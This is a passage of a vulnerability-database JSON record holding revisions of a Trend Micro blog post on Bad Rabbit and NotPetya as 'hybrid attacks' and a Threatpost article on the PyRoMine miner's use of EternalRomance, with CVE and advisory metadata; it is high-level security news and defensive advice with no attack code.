\n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked, attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even when suspicious activity is detected in one area, defenders aren't distracted to the point that a secondary, more damaging attack goes unnoticed. \n\nThe basics still matter: the SMB flaws exploited by EternalRomance (CVE-2017-0145) and EternalBlue, which Bad Rabbit and NotPetya respectively used to move laterally, are both addressed by Microsoft's MS17-010 security update, so hosts that had applied it were not exposed to that spreading technique. Beyond patching, precautions such as end-to-end monitoring are ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack and provide granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. 
\n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 15}, "differentElements": ["description", "href"], "edition": 4}, {"lastseen": "2017-11-22T20:27:02", "bulletin": {"published": "2017-11-20T16:29:06", "href": "http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T20:27:02", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "![What happens when one attack hides other, damaging malicious activity?](http://blog.trendmicro.com/wp-content/uploads/2017/11/What-happens-when-one-attack-hides-other-damaging-malicious-activity-_459_40167595_0_14133878_500-300x199.jpg)\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. 
In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or for making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is likely to be used increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security incident of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit malware utilized an NSA exploit leaked by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread laterally across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its lateral movement. That exploit targets a flaw in Microsoft Windows Server Message Block (SMB) identified as CVE-2017-0145. The vulnerability lies in the Windows SMB service that handles data transfer between Windows hosts, and it lets an unauthenticated remote attacker bypass security controls and achieve remote code execution. 
\n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from compromised Russian media sites, which served a fake Flash Player update to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\n![Brown rabbit sitting in the grass. ](https://pictures.brafton.com/x_0_0_0_14113964_800.jpg)Don't be fooled: Bad Rabbit initially appeared to be just another ransomware outbreak leveraging a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged a malicious email to breach victims, and then moved on to encrypting individual files, including .exe files. 
\n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya relied on a malicious email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to propagate - including the EternalBlue SMB exploit, which requires no human interaction for a successful breach. NotPetya also encrypts more of the system, to the point that the hard drive is rendered inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying [code] that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. 
\n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked, attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even when suspicious activity is detected in one area, defenders aren't distracted to the point that a secondary, more damaging attack goes unnoticed. \n\nThe basics still matter: the SMB flaws exploited by EternalRomance (CVE-2017-0145) and EternalBlue, which Bad Rabbit and NotPetya respectively used to move laterally, are both addressed by Microsoft's MS17-010 security update, so hosts that had applied it were not exposed to that spreading technique. Beyond patching, precautions such as end-to-end monitoring are ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack and provide granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. 
\n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 16}, "differentElements": ["description", "href"], "edition": 5}], "_object_type": "robots.models.rss.RssBulletin", "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-11-26T20:03:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-11-26T20:03:00", "rev": 2}}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "enchantments_done": [], "cvelist": ["CVE-2017-0145"], "references": [], "description": "![What happens when one attack hides other, damaging malicious 
activity?](https://blog.trendmicro.com/wp-content/uploads/2017/11/What-happens-when-one-attack-hides-other-damaging-malicious-activity-_459_40167595_0_14133878_500-300x199.jpg)\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. 
This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. 
Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\n![Brown rabbit sitting in the grass. ](https://pictures.brafton.com/x_0_0_0_14113964_800.jpg)Don't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. 
Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. 
[Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 190, "immutableFields": [], "cvss2": {}, "cvss3": {}}], "threatpost": [{"id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "hash": "398fac8eba652e6430142737bf248696", "type": "threatpost", "bulletinFamily": "info", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. 
Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. 
Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. 
\u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. 
Once again, we are the attack vector and the computer suffers.\u201d\n", "published": "2018-04-26T18:21:13", "modified": "2018-04-26T18:21:13", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html", "https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/", "https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/", "https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/", "https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/"], "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "lastseen": "2019-04-25T05:50:11", "history": [{"bulletin": {"id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "hash": "9dd27daad748c2cb91318dd687e30247", "type": "threatpost", "bulletinFamily": "info", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. 
Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. 
But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. 
SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. 
Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "published": "2018-04-26T14:21:13", "modified": "2018-05-01T12:49:38", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html", "https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/", "https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/", "https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/", "https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/"], "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "lastseen": "2018-10-06T22:52:29", "history": [], "viewCount": 2, "enchantments": 